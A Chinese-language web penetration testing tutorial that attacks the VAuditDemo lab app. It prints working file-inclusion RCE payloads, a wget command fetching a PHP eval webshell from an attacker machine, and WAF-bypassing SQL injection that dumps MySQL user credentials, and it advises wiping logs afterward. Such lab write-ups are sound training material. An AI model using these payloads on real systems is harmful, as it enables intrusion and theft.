一、滲透測(cè)試概念

寫在開始：進(jìn)行web滲透測(cè)試之前，務(wù)必獲得測(cè)試目標(biāo)擁有者或組織的書面授權(quán)，明確滲透測(cè)試的范圍。在授權(quán)范圍內(nèi)進(jìn)行滲透測(cè)試，測(cè)試結(jié)束之后，務(wù)必清除滲透測(cè)試留下的痕跡，包括訪問日志、事件記錄、上傳的shell腳本、創(chuàng)建的影子賬戶等等。

滲透測(cè)試，并沒有一個(gè)標(biāo)準(zhǔn)的定義，但通常被解釋為一種評(píng)估計(jì)算機(jī)網(wǎng)絡(luò)系統(tǒng)安全的方法。這個(gè)過程模擬惡意黑客的攻擊方式，以尋找并利用系統(tǒng)中的安全漏洞。滲透測(cè)試旨在挖掘目標(biāo)系統(tǒng)的安全漏洞，取得系統(tǒng)的控制權(quán)，訪問系統(tǒng)的機(jī)密數(shù)據(jù)，并發(fā)現(xiàn)可能影響業(yè)務(wù)持續(xù)運(yùn)作的安全隱患。

滲透測(cè)試與黑客入侵的最大區(qū)別在于其進(jìn)行方式。滲透測(cè)試是經(jīng)過客戶授權(quán)，采用可控制、非破壞性質(zhì)的方法和手段對(duì)目標(biāo)和網(wǎng)絡(luò)設(shè)備進(jìn)行檢測(cè)。這不僅能幫助管理者了解他們網(wǎng)絡(luò)所面臨的問題，還能提供針對(duì)這些問題的安全加固建議，從而幫助客戶提升系統(tǒng)的安全性。

滲透測(cè)試按照軟件測(cè)試的理念分為三種類型：白盒測(cè)試、黑盒測(cè)試、灰盒測(cè)試。其中白盒測(cè)試是基于代碼審查，再結(jié)合漏洞掃描等技術(shù)進(jìn)行，黑盒測(cè)試在業(yè)內(nèi)也稱為盲測(cè)，除了有測(cè)試范圍之外，其他全部模擬黑客攻擊的過程進(jìn)行操作，灰盒測(cè)試是結(jié)合白盒測(cè)試的代碼審計(jì)、黑盒測(cè)試的攻擊策略和技術(shù)的一種折中類型。白盒測(cè)試的因?yàn)閾碛心繕?biāo)所有內(nèi)部與底層的知識(shí)，因此可以用最小的代價(jià)發(fā)現(xiàn)更多嚴(yán)重的隱藏的漏洞。黑盒測(cè)試因?yàn)槭敲y(cè)，因此需要依賴較高的技術(shù)能力，攻擊方式也變得多樣性，從而可以更完整的評(píng)估目標(biāo)的安全風(fēng)險(xiǎn)，也可以檢測(cè)到目標(biāo)團(tuán)隊(duì)的應(yīng)急能力。灰盒測(cè)試集兩者之長，既能快速全面檢測(cè)出漏洞，同時(shí)還具備了更完整的安全風(fēng)險(xiǎn)評(píng)估能力。

安全漏洞生命周期劃分

安全漏洞被發(fā)現(xiàn)到其消亡的過程被劃分為7個(gè)步驟，其中包含的概念如下：

Exploit，簡(jiǎn)稱EXP，利用安全漏洞造成入侵或破壞的滲透代碼，又叫漏洞利用代碼

POC：Proof of Concept：概念驗(yàn)證，只是驗(yàn)證漏洞的存在，并不會(huì)利用該漏洞進(jìn)行入侵。

Exploit：EXP：發(fā)現(xiàn)漏洞后，使用惡意代碼或惡意指令進(jìn)行漏洞的利用和入侵。

0 Day：第一個(gè)發(fā)現(xiàn)的漏洞，同時(shí)官方還沒有發(fā)布補(bǔ)丁，也未公開該漏洞，漏洞處于可利用階段。

RCE：Remote Code/Command Execution 遠(yuǎn)程代碼/命令執(zhí)行。

SRC：安全應(yīng)急響應(yīng)中心 Security Emergency Response Center。

二、web滲透測(cè)試的步驟

滲透測(cè)試步驟分為前期交互、情報(bào)收集、匯總分析、滲透攻擊、后滲透攻擊、報(bào)告提交等六個(gè)階段

1、前期交互：這個(gè)階段主要是和委托方進(jìn)行商討洽談、獲取書面授權(quán)、測(cè)試范圍的確定等工作

2、情報(bào)搜集：在獲得授權(quán)的基礎(chǔ)上，對(duì)測(cè)試目標(biāo)進(jìn)行相應(yīng)的情報(bào)收集，包括網(wǎng)絡(luò)基本配置、域名、人員權(quán)限劃分、暴露的端口、系統(tǒng)入口、web后臺(tái)入口等

3、匯總分析：該階段基于上一步驟、對(duì)所有收集的信息進(jìn)行匯總整理、從中找出合適的滲透方向、策略，選定合適的工具以及人員分工

4、滲透攻擊：開始進(jìn)行漏洞挖掘、掃描、找出可用的載荷（payload），進(jìn)行漏洞利用

5、后滲透攻擊：getshell、上傳木馬、修補(bǔ)漏洞、清除痕跡和腳本

6、報(bào)告編寫：將所有找到的安全漏洞匯總為一份滲透測(cè)試報(bào)告，提交給委托方，完成滲透任務(wù)。

本文將依據(jù)以上的步驟以一個(gè)web靶場(chǎng)為例，闡述web滲透測(cè)試基本流程和注意事項(xiàng)。

三、靶場(chǎng)部署

服務(wù)器配置：

操作系統(tǒng)CentOS7、2核CPU、2G內(nèi)存、30G磁盤、網(wǎng)絡(luò)可以訪問，IP：192.168.211.132，部署xampp，vaudit

客戶端配置

主機(jī)操作系統(tǒng)windows11，IP：192.168.1.5

滲透機(jī)CentOS7，IP：192.168.211.129，部署xampp，存儲(chǔ)攻擊用的shell

靶場(chǎng)搭建過程

從gitee上面下載的一個(gè)開源軟件vaudit，下載地址：https://github.com/1stPeak/VAuditDemo 作者是Virink。

1、先在CentOS上面安裝一個(gè)xampp5.6版本，

2、使用添加VHosts和端口的方式部署vaudit

在lampp/etc/extra目錄下面，通過添加新的vhosts虛擬主機(jī)的方式來進(jìn)行處理，只需要修改兩個(gè)配置文件即可。

（1）修改/opt/lampp/etc/httpd.conf，添加監(jiān)聽端口，并且包含httpd-vhosts.conf文件。

Listen 80  # 默認(rèn)端口

Listen 81  # VAudit端口

Listen 82  # 預(yù)留端口

Include etc/extra/httpd-vhosts.conf   # 取消前面的 # 號(hào)注釋

（2）修改/opt/lampp/etc/extra/httpd-vhosts.conf

# 先注釋掉其他已有的*:80的模板內(nèi)容，增加以下內(nèi)容

<VirtualHost *:81>

    ServerName localhost

    DocumentRoot "/opt/lampp/htdocs/vaudit"

</VirtualHost>

3、修改基本配置

使用網(wǎng)站管理中的php配置，將allow_url_include設(shè)置為On，也就是需要使用到遠(yuǎn)程文件包含功能。

如果xampp啟動(dòng)失敗，需要在lampp的啟動(dòng)程序lampp中找到2.2.0，修改為2.8.0，如下位置

436         export LD_ASSUME_KERNEL=2.8.0

4、接下來修改并且配置數(shù)據(jù)庫連接，使用vi打開/opt/lampp/htdocs/vaudit/sys目錄下面的config.php文件

<?php

  error_reporting(0);

  if (!file_exists($_SERVER["DOCUMENT_ROOT"] . '/sys/install.lock')) {

        header("Location: /install/install.php");

        exit;

}

  // 注意這行代碼，是一個(gè)功能bug，下面這行是原文，需要?jiǎng)h掉路徑中../sys/,否則留言板功能失效。

  //include_once '../sys/lib.php';

  include_once 'lib.php';

  // 下面為數(shù)據(jù)庫的連接設(shè)置，默認(rèn)安裝是不用修改的

  $host="localhost";

  $username="root";

  $password="root";

  $database="vauditdemo";

  $conn=mysql_connect($host, $username, $password);

  mysql_query('set names utf8', $conn);

  mysql_select_db($database, $conn) or die(mysql_error());

  if (!$conn) {

        die('Could not connect: ' . mysql_error());

        exit;
}

  session_start();

  ?>

完成上述步驟之后，在瀏覽器中輸入http://192.168.211.132:81/ 看到VAuditDemo安裝界面

可以看出有兩個(gè)目錄沒有寫權(quán)限，需要sys和uploads進(jìn)行賦權(quán),在/www/admin/localhost_80/wwwroot下面執(zhí)行下面的命令，這里只需要給other賦予寫入權(quán)限即可。

chmod o+w sys uploads

然后刷新瀏覽器，現(xiàn)在看到可以安裝了

點(diǎn)擊安裝，看到如下提示，表示完成

點(diǎn)擊確定之后，進(jìn)入到vaudit的主頁面

四、信息采集

現(xiàn)在我們需要熟悉這個(gè)軟件系統(tǒng)的基本功能，跟蹤和監(jiān)控web頁面上的各個(gè)接口及交互的數(shù)據(jù)，這里需要使用到一些工具：sqlmap、burp suite、御劍后臺(tái)掃描工具、帶hackbar的firefox瀏覽器等。

先注冊(cè)一個(gè)用戶tester，然后使用tester進(jìn)入，開啟對(duì)系統(tǒng)的使用之旅，通過使用我們可以發(fā)現(xiàn)，注冊(cè)普通用戶不需要驗(yàn)證碼，普通用戶修改用戶信息不需要二次驗(yàn)證，可以上傳圖頭像圖片，搜索接口，留言，查看留言，關(guān)于頁面等普通用戶可以點(diǎn)擊或使用的功能。

接下來使用御劍后臺(tái)掃描工具，對(duì)系統(tǒng)進(jìn)行掃描

通過掃描我們可以發(fā)現(xiàn)，該目標(biāo)站點(diǎn)存在一個(gè)后臺(tái)登錄的頁面，可以試試看

這里可以看出后臺(tái)登錄是有驗(yàn)證碼的，看來暫時(shí)是動(dòng)不了這里。不過從這里我們可以看出已經(jīng)有好多個(gè)接口或功能可以提供給我們驗(yàn)證了，那么我們可以進(jìn)入下一個(gè)環(huán)節(jié)，看看是否能夠找到一些滲透的切入點(diǎn)。

五、概念驗(yàn)證

針對(duì)一個(gè)web系統(tǒng)，能夠使用的滲透點(diǎn)主要包括登錄密碼的暴力破解、SQL注入、XSS注入、CSRF、文件包含等，對(duì)于普通用戶進(jìn)行暴力破解沒有必要，因?yàn)槲覀兛梢宰约鹤?cè)一個(gè)普通用戶，這里主要是考慮如何能夠切入到數(shù)據(jù)庫或者存儲(chǔ)型的XSS、如果有文件包含也不錯(cuò)，可以進(jìn)行利用。

1、經(jīng)過反復(fù)測(cè)試，可以發(fā)現(xiàn)一個(gè)有意思的地方：http://192.168.211.128/index.php?module=about 這個(gè)地址的module翻譯過來為模塊，而about正好指向關(guān)于頁面。嘗試將about改成其他任意的單詞，看看頁面返回情況，在這個(gè)過程中可以發(fā)現(xiàn)頁面不會(huì)報(bào)錯(cuò)，但是也沒有相應(yīng)的提示，那么這里應(yīng)該是一個(gè)文件包含的用法，沒有拋出錯(cuò)誤，估計(jì)是代碼中給文件加了后綴，并且做了異常控制。可以初步確認(rèn)，這里存在一個(gè)文件包含的漏洞，需要進(jìn)一步驗(yàn)證。

2、接下來關(guān)注一下留言功能，這里是允許用戶輸入內(nèi)容的，在滲透中有一個(gè)核心的思想，那就是所有的輸入是否用戶可控，一般來說，用戶可控的輸入都有一定的幾率存在安全風(fēng)險(xiǎn)，如果后端代碼未做過濾或者過濾不夠徹底，那么這些地方就是機(jī)會(huì)，因此先從此處入手試試看。在這個(gè)位置，我們可以嘗試的有sql注入和存儲(chǔ)型XSS，先試試sql注入，由于留言屬于插入功能，因此這里優(yōu)先考慮報(bào)錯(cuò)注入，看看是否有機(jī)會(huì)

結(jié)果發(fā)現(xiàn)，注入的sql代碼被原樣顯示，顯然這里沒有sql注入，那么再檢測(cè)一下是否可以進(jìn)行XSS,在輸入框中輸入以下代碼test<script>console.log(/test/)</script> 提交留言

可以看出，還是被原文顯示，說明這里漏洞也被堵了，那么點(diǎn)擊查看留言詳情試試，這里我們可以獲得留言詳情的接口地址：http://192.168.211.128/messageDetail.php?id=9 這里參數(shù)id看起來應(yīng)該是一個(gè)查詢條件，那么可以嘗試看看這里是否存在注入的可能。在hackbar中輸入http://192.168.211.128/messageDetail.php?id=9 or 1=1# 可以看到下圖顯示

從圖上可以看出這里有回顯，且從提示看一看出，sql代碼被waf（web application firewall），這里可以知道目標(biāo)使用了一種web防火墻基礎(chǔ)，而or被替換為了sqlwaf，可以看出其防火墻代碼采取的是替換策略，那么根據(jù)經(jīng)驗(yàn)可以試試其他的關(guān)鍵字和關(guān)鍵符號(hào)，看看替換中是否存在漏洞可以利用，在sql注入中，&&、||、_下劃線，單引號(hào)，雙引號(hào)這些符號(hào)是非常有用的，如果這些符號(hào)被替換，那么我們可能就得另謀出路。因此將這幾個(gè)符號(hào)放在主要嘗試的位置。經(jīng)過嘗試可以發(fā)現(xiàn)下劃線、單引號(hào)和雙引號(hào)也被轉(zhuǎn)義了，而&&和||被替換為了空，這里就留下了一個(gè)注入漏洞，可以利用||來繞過關(guān)鍵字的waf。

從這里我們可以看出目前至少有兩個(gè)漏洞可以試試，下面我們就開始嘗試，看看這兩個(gè)漏洞是否可以進(jìn)行利用。

六、漏洞利用

1、文件包含漏洞的利用

針對(duì)文件包含類的漏洞利用，需要知道的是有兩種包含方式，第一種就是本地文件包含，這種漏洞的利用可以獲取到服務(wù)器上面的基本信息，如果有文件上傳漏洞存在，則可以將二者進(jìn)行結(jié)合，從而getshell。而文件包含的利用需要用到php的偽協(xié)議相關(guān)的知識(shí)，這里我們可以試試data偽協(xié)議。

先使用下面的payload試試

http://192.168.211.132:81/index.php?module=data://text/plain,<?php phpinfo();?>

這個(gè)結(jié)果表示，我們其實(shí)已經(jīng)可以執(zhí)行OS的命令，也就是getshell。比如可以執(zhí)行如下的payload

http://192.168.211.132:81/index.php?module=data://text/plain,<?php echo `ifconfig`;?>

可以看到已經(jīng)從服務(wù)器獲取到了信息，那么可以順著這個(gè)思路往下，將服務(wù)器上面的所有能看的文件都進(jìn)行瀏覽，從而獲取我們需要的信息。另外也可以實(shí)施掛馬的操作。從攻擊服務(wù)器上面去下載一個(gè)一句話木馬，如果在外網(wǎng)上面，那么服務(wù)器需要提供外網(wǎng)的訪問功能。服務(wù)器腳本的位置就直接方法/opt/lampp/htdocs下面，腳本名字可以根據(jù)需要來改，其內(nèi)容只有一句話<?php eval($_POST[0]);?> 在瀏覽器中執(zhí)行下面的payload

http://192.168.211.132:81/index.php?module=data://text/plain,<?php `wget http://192.168.211.129/shell.inc -O /tmp/shell.php`;?>

在被攻擊的服務(wù)器上面的/tmp目錄下面可以看到下面的結(jié)果

木馬上傳成功，后續(xù)可以使用蟻劍等工具進(jìn)行連接服務(wù)，實(shí)施其他的操作。

2、sql注入漏洞利用

根據(jù)前面概念驗(yàn)證的結(jié)果，可以看出在返回留言詳情的地方可以進(jìn)行SQL注入，先嘗試最直接的方法就是聯(lián)合注入，payload如下

http://192.168.211.132:81/messageDetail.php?id=7 uni||on sel||ect database(),version(),user(),4 #

可以看到結(jié)果

從這里看出，其內(nèi)部數(shù)據(jù)庫配置的是本地用戶root@localhost，這里可以試試能否直接從information_schema中獲取表信息，使用payload如下,這里因?yàn)橐@開單引號(hào)轉(zhuǎn)義，需要把數(shù)據(jù)庫部分的'vauditdemo'轉(zhuǎn)成hex，即0x2776617564697464656d6f27

sel||ect table_name fr||om info||rmation_schema.tables whe||re table_schema=0x2776617564697464656d6f27

但是看到的結(jié)果如下：

這里可以看到內(nèi)部對(duì)下劃線做了轉(zhuǎn)義，因此無法從information_schema中遍歷數(shù)據(jù)庫信息，那就干脆試試能否從MySQL庫中獲取用戶信息，payload如下：

http://192.168.211.132:81/messageDetail.php?id=7 uni||on sel||ect database(),version(),user(),(sel||ect conc||at(host,0x7e,user,0x7e,passwo||rd) fr||om mysql.user) #

可以看到結(jié)果如下：

Subquery returns more than 1 row The result for [7 union select database(),version(),user(),(select concat(host,0x7e,user,0x7e,password) from mysql.user) ] is: 

這里表示返回的數(shù)據(jù)不止一行，那可以使用limit進(jìn)行逐行遍歷，payload如下

http://192.168.211.132:81/messageDetail.php?id=7 uni||on sel||ect database(),version(),user(),(sel||ect conc||at(host,0x7e,user,0x7e,passwo||rd) fr||om mysql.user lim||it 0,1) #

可以看到結(jié)果

繼續(xù)遍歷，就可以發(fā)現(xiàn)數(shù)據(jù)庫里面的具體用戶信息，其中包含遠(yuǎn)程連接權(quán)限的用戶

這個(gè)時(shí)候需要對(duì)用戶humh的密碼進(jìn)行創(chuàng)庫破解，然后使用這個(gè)用戶進(jìn)行遠(yuǎn)程登錄到數(shù)據(jù)庫服務(wù)器，對(duì)數(shù)據(jù)庫進(jìn)行操作，這個(gè)時(shí)候就完美的避開了系統(tǒng)的waf。

七、報(bào)告編寫

1、文件包含問題

2、SQL注入風(fēng)險(xiǎn)

2、報(bào)告模板

八、寫在最后

本文主要基于靶場(chǎng)環(huán)境，闡述web滲透中的一些技巧和方法，文中僅僅選取了兩個(gè)漏洞作為演示，該系統(tǒng)中實(shí)際包含的漏洞超過10個(gè)，有需要者可以按照本文中的步驟去慢慢挖掘。

網(wǎng)絡(luò)安全是軟件系統(tǒng)質(zhì)量模型中的重要指標(biāo)之一，網(wǎng)絡(luò)漏洞和普通缺陷的區(qū)別在于普通的缺陷一般造成的是功能的失效，從而導(dǎo)致用戶使用存在困難或者用戶無法使用，而網(wǎng)絡(luò)安全漏洞則可能是在用戶無感知的情況下，被有心人進(jìn)行利用，從而導(dǎo)致用戶數(shù)據(jù)，公司機(jī)密等重要信息的泄露，或者服務(wù)器或個(gè)人設(shè)備整個(gè)被轉(zhuǎn)成肉雞，為攻擊者的攻擊提供便利和掩護(hù)。網(wǎng)絡(luò)安全漏洞不需要多，一個(gè)就行，因此系統(tǒng)在研發(fā)開始就需要將網(wǎng)絡(luò)安全引入，現(xiàn)在流行的稱謂是安全左移，網(wǎng)絡(luò)安全要做到100%，甚至200%才可以。